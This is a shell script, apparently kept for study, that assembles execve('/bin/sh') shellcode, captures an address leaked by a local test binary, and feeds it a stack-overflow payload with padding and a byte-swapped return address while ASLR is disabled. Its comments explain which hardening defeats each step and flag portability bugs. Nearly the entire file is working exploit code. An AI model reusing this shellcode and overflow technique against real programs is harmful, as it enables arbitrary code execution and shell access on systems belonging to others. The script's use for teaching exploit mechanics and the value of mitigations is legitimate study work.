#!/bin/sh
# Demonstration exploit script against a local test binary (./victim), kept for
# study of the attack shape: it assembles a tiny payload (syscall 0x3b with
# "/bin/sh" as the argument), reads one line the victim prints, and feeds the
# payload back to the victim on stdin.  Every step relies on a mitigation being
# absent or explicitly switched off -- ASLR is disabled with `setarch -R`, the
# image base is hard-coded as a non-PIE 0x400000, and the byte counts are tuned
# to one specific build of ./victim.  Standard hardening (ASLR, PIE, NX stack,
# stack protector) each break a step below, which is the defender's takeaway.
#
# NOTE(review): no `set -eu`; unquoted backtick substitutions and an unquoted
# `$a` in the pipeline.  The echo on the next line also depends on the /bin/sh
# `echo` interpreting `\n` escapes (dash does; bash's builtin echo does not
# without -e), so the generated shell.c may not compile under every sh.
# Emit a C file whose inline asm carries the payload between the needle0 and
# needle1 labels; the labels exist only so the bytes can be located afterwards.
echo 'int main() {\n asm("\\\nneedle0: jmp there\\n\\\nhere: pop %rdi\\n\\\n xor %rax, %rax\\n\\\n movb $0x3b, %al\\n\\\n xor %rsi, %rsi\\n\\\n xor %rdx, %rdx\\n\\\n syscall\\n\\\nthere: call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n ");\n}' > shell.c
# a.out is only a container to pull the assembled bytes out of; it is not run.
gcc shell.c
# Locate the two labels in the disassembly (address is the first space-separated
# field of the "<needle0>:" / "<needle1>:" lines).  Scraping objdump text with
# grep/cut is brittle across binutils versions.
start=`objdump -d a.out | grep '<needle0>:' | cut -f 1 -d ' '`
end=`objdump -d a.out | grep '<needle1>:' | cut -f 1 -d ' '`
# Turn virtual addresses into file offsets by subtracting a hard-coded 0x400000
# load base -- only valid for a non-PIE x86-64 image laid out that way.
start=$((0x$start-0x400000))
end=$((0x$end-0x400000))
# Length of the labelled region, rounded up to the next multiple of 32.
l=$((end-start))
while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done
# Dump those l bytes of a.out as a plain hex string into ./shellcode
# (xxd's second positional argument is the output file).
xxd -s0x`printf %x $start` -l$l -p a.out shellcode
# Run the victim with address-space randomisation disabled (setarch -R) and keep
# the first line it prints; presumably that line is an address the victim leaks
# -- cannot be confirmed from here.  "Camil" is whatever input this victim
# expects on its first read.
a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1)
# Zero-pad to 16 hex digits, then reverse the string in two-character groups
# (tac with separator "..") -- i.e. byte-swap the value to little-endian order.
a=$(printf %016x $a | tac -rs..)
# Build the input: shellcode hex, 464 zero hex digits of filler, then the
# swapped address; xxd -r -p turns the hex back into raw bytes.  The trailing
# `cat` keeps the victim's stdin open after the payload has been sent.  The 464
# is victim-specific padding and would need re-measuring for any other build.
( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim